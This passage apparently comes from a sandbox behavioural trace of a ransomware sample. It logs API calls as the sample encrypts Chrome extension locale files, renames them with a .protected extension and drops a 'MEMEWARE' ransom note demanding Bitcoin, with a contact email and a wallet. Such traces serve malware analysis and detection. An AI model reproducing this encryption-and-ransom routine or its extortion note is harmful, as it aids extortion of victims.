| out: lpNewFilePointer=0xffffffff) returned 1 [0080.468] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xff, lpOverlapped=0x0) returned 1 [0080.468] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.468] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.468] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.468] CloseHandle (hObject=0x168) returned 1 [0080.468] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.protected") returned 165 [0080.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json.protected")) returned 1 [0080.469] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.469] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\RESTORE_FILES.txt") returned 159 [0080.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.470] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.470] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.471] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.471] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.471] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.471] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.471] CloseHandle (hObject=0x164) returned 1 [0080.471] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0080.471] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0080.471] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi") returned 141 [0080.471] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0080.471] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0080.471] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*") returned 143 [0080.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.472] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.472] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.472] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.472] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.472] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.472] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\.") returned 143 [0080.472] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.472] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.472] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.472] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.472] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.472] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.472] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.472] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\..") returned 144 [0080.472] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.473] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.473] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.473] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.473] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.473] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.473] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json") returned 155 [0080.473] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.473] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb7, lpOverlapped=0x0) returned 1 [0080.474] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff49, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.474] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb7, lpOverlapped=0x0) returned 1 [0080.474] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.475] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.475] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.475] CloseHandle (hObject=0x168) returned 1 [0080.475] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.protected") returned 165 [0080.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\messages.json.protected")) returned 1 [0080.476] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.476] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.476] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0080.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.476] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.476] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.477] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.477] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.477] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.477] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.477] CloseHandle (hObject=0x164) returned 1 [0080.477] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0080.477] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0080.477] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil") returned 142 [0080.478] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0080.478] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*") returned 144 [0080.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\.") returned 144 [0080.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\..") returned 145 [0080.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.478] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.478] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.479] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.479] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.479] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.479] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.479] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json") returned 156 [0080.479] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.479] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc7, lpOverlapped=0x0) returned 1 [0080.480] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.480] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc7, lpOverlapped=0x0) returned 1 [0080.480] SetFilePointerEx (in: 